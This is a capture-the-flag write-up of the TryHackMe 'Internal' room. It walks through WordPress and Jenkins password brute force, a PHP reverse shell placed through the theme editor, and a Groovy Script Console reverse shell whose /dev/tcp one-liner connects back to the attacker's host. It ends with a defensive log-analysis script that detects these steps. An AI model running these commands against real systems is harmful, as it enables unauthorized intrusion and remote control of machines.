###### tags: `TryHackMe OffensiveSecurity AdvancedExploitation`

# Internal

:::info
I have been assigned to a client that wants a penetration test conducted on an environment due to be released to production in seven days. The client requests that an engineer conducts an assessment of the provided virtual environment. The client has asked that minimal information be provided about the assessment, wanting the engagement conducted from the eyes of a malicious actor (black box penetration test).

The client has asked that I secure two flags (no location provided) as proof of exploitation:

- User.txt
- Root.txt
:::

## Reconnaissance

### Port enumeration with nmap

![](https://i.imgur.com/lOMw6is.png)

Ports ssh and http are open. Since there is a web server running, let's enumerate its directories with Gobuster:

![](https://i.imgur.com/lTKQAKt.png)

We can see that the web server uses WordPress. I also notice that the site at the given IP tries to connect to the domain name `internal.thm`:

![](https://i.imgur.com/iMo8Lp8.png)

I chose to add the domain name associated with the IP to my `/etc/hosts` file.

![](https://i.imgur.com/9SXj99s.png)

Browsing the web server, I found the WordPress login form:

![](https://i.imgur.com/C495rlF.png)

I decided to use a tool called `wpscan` to enumerate WordPress and try to find any credentials:

```
wpscan --url 10.10.1.198/blog -e u
```

- `-e u`: enumerate users

![](https://i.imgur.com/eDiDbAL.png)

After the user enumeration, we can see that `admin` is the administrator username:

![](https://i.imgur.com/rtt4hLx.png)

Let's use this information to retrieve his password, again with `wpscan`:

```
wpscan --url 10.10.1.198/blog -U admin -P /usr/share/wordlists/rockyou.txt
```

- `-U`: the username we found
- `-P`: the wordlist used to brute force the password

![](https://i.imgur.com/6qruB9m.png)

![](https://i.imgur.com/K5c4oMA.png)

We now have all the elements needed to log in to the WordPress admin page.
```
Username : admin
Password : my2boys
```

![](https://i.imgur.com/PItd8U6.png)

:::success
BINGO!!!
:::

## Gaining initial access

Now let's find a way to gain initial access. I tried to paste a PHP reverse shell into a PHP file from the dashboard. To do so, I explored the dashboard and found a PHP page in the theme editor. I deleted its content and pasted my PHP reverse shell:

![](https://i.imgur.com/PnveuNm.png)

To trigger it, I started a netcat listener and navigated to this URL: `10.10.1.198/blog/wp-content/themes/twentyseventeen/404.php`

![](https://i.imgur.com/br0FXd1.png)

:::success
I gained initial access.
:::

## Privilege escalation

After gaining an initial shell, my goal is to gain enough privileges to become the root user.

![](https://i.imgur.com/LDcvPKP.png)

While I was enumerating some directories, I found a file called `wp-save.txt` in the `/opt` directory. To my amazement, the file contained *aubreanna*'s credentials.

![](https://i.imgur.com/xvrAgPc.png)

We saw earlier in the reconnaissance step that the ssh port was open. Let's use aubreanna's credentials to connect to the server.

![](https://i.imgur.com/MvC2Kw4.png)

:::success
I am now the user aubreanna.
:::

Let's elevate our privileges again and become **root**. In aubreanna's home directory I found a file called `jenkins.txt`; here is the content of the file:

![](https://i.imgur.com/zReALCH.png)

So we can guess that Jenkins is running on port 8080. Let's create a tunnel to access the service from my local machine:

```
ssh -L 8080:localhost:8080 aubreanna@10.10.1.198
```

![](https://i.imgur.com/9MZceoL.png)

Now, from our browser, let's access the Jenkins portal:

![](https://i.imgur.com/HGbZHov.png)

I tried to brute force the form with Burp Suite:

![](https://i.imgur.com/blfeMX5.png)

I chose the `rockyou.txt` wordlist. In the figure above we can see that the response length for the `spongebob` password is different from the others.
Given the difference in response size, we can tell the correct password from the incorrect ones and successfully log in.

:::success
Correct password : spongebob
:::

After logging in to the Jenkins dashboard, I found several tools, such as the Script Console:

![](https://i.imgur.com/u0nFUrN.png)

I will use this tool to run a reverse shell and get root privileges. I found the commands to spawn a bash shell on the internet:

```
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.11.33.232/1235;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
```

![](https://i.imgur.com/mLVAd8v.png)

After running the script, I had a reverse shell in my waiting netcat listener. And as before, I found the **root password** in the `/opt` directory.

![](https://i.imgur.com/QTLbczc.png)

:::success
user : root
password : tr0ub13guM!@#123
:::

I used ssh to connect to the machine with these credentials.

![](https://i.imgur.com/MYazVub.png)

:::success
I NOW HAVE ROOT PRIVILEGES.
:::
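Every step of this path leaves a trace in the access logs of the two services involved. As an added defender's counterpart (example code written for this page, not part of the original writeup or of the TryHackMe room), the script below runs a few detection rules over constructed log lines: the `?author=` and REST user-enumeration probes and the `wp-login.php` password guessing from the WordPress phase, and the login brute force and the Script Console POST from the Jenkins phase. It assumes NCSA combined-format logs from both Apache and Jenkins (Jenkins only writes an access log when one is configured), the Jenkins login endpoint names are an assumption about the deployment's version, and all IPs, timestamps and thresholds are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime

# NCSA "combined" access log line, as written by Apache in front of WordPress and,
# when access logging is enabled, by Jenkins' built-in Winstone server (assumption:
# the Jenkins log uses the same layout; adjust the regex if yours differs).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Login form targets: WordPress, and Jenkins (the Jenkins path depends on the
# version; both spellings are listed as an assumption about the deployment).
LOGIN_PATHS = ("/wp-login.php", "/j_acegi_security_check", "/j_spring_security_check")
# Jenkins Script Console endpoints: a POST here runs Groovy as the Jenkins user.
SCRIPT_CONSOLE_PATHS = ("/script", "/scriptText")
# WordPress user-enumeration probes of the kind wpscan's "-e u" sends.
ENUM_MARKERS = ("?author=", "/wp-json/wp/v2/users")

BRUTE_FORCE_THRESHOLD = 10   # login POSTs from one source IP ...
BRUTE_FORCE_WINDOW_S = 60    # ... within this many seconds


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["path"] = rec["url"].split("?", 1)[0]   # path without the query string
    return rec


def analyse(lines):
    """Return a list of (source_ip, finding) tuples for the suspicious activity above."""
    findings = []
    login_times = defaultdict(list)   # ip -> timestamps of recent login POSTs
    flagged_bf, flagged_ua = set(), set()
    for raw in lines:
        rec = parse_line(raw)
        if rec is None:
            continue
        ip, url, path = rec["ip"], rec["url"], rec["path"]
        if any(marker in url for marker in ENUM_MARKERS):
            findings.append((ip, f"wordpress user enumeration probe: {url}"))
        if "WPScan" in rec["ua"] and ip not in flagged_ua:
            # heuristic only: the user agent is trivially changed by the client
            findings.append((ip, "WPScan user agent seen"))
            flagged_ua.add(ip)
        if rec["method"] == "POST" and path.endswith(SCRIPT_CONSOLE_PATHS):
            findings.append((ip, f"jenkins script console execution: POST {path} -> {rec['status']}"))
        if rec["method"] == "POST" and path.endswith(LOGIN_PATHS) and ip not in flagged_bf:
            times = login_times[ip]
            times.append(rec["ts"])
            # slide the window: drop timestamps older than BRUTE_FORCE_WINDOW_S
            while (times[-1] - times[0]).total_seconds() > BRUTE_FORCE_WINDOW_S:
                times.pop(0)
            if len(times) >= BRUTE_FORCE_THRESHOLD:
                findings.append((ip, f"login brute force: {len(times)} POSTs to {path} "
                                     f"within {BRUTE_FORCE_WINDOW_S}s"))
                flagged_bf.add(ip)
    return findings


def _line(ip, ts, method, url, status, ua="Mozilla/5.0"):
    """Build one constructed combined-format log line."""
    return f'{ip} - - [{ts}] "{method} {url} HTTP/1.1" {status} 512 "-" "{ua}"'


# Constructed sample: one benign visitor, then a scanner at 10.0.0.5 that enumerates
# users, guesses passwords against wp-login.php, and later POSTs to the Script Console.
SCANNER_UA = "WPScan v3.x (constructed user agent)"
SAMPLE_LOG = [
    _line("10.0.0.9", "03/Mar/2021:10:00:00 +0000", "GET", "/blog/", 200),
    _line("10.0.0.5", "03/Mar/2021:10:00:05 +0000", "GET", "/blog/?author=1", 301, SCANNER_UA),
    _line("10.0.0.5", "03/Mar/2021:10:00:06 +0000", "GET", "/blog/wp-json/wp/v2/users/", 200, SCANNER_UA),
] + [
    _line("10.0.0.5", f"03/Mar/2021:10:01:{i:02d} +0000", "POST", "/blog/wp-login.php", 200, SCANNER_UA)
    for i in range(12)
] + [
    _line("10.0.0.5", "03/Mar/2021:10:05:00 +0000", "POST", "/script", 200),
    "this line is not an access log entry and is skipped",
]

if __name__ == "__main__":
    for ip, finding in analyse(SAMPLE_LOG):
        print(f"{ip}: {finding}")
```

On the constructed sample the benign visitor produces nothing, while 10.0.0.5 yields two enumeration findings, one user-agent hit, one brute-force finding (raised once the tenth POST lands inside the window) and one Script Console execution. Feed it real lines from the Apache log and from a Jenkins access log; the Script Console rule in particular is worth alerting on unconditionally, since legitimate use of `/script` is rare and each POST is arbitrary code execution as the Jenkins account.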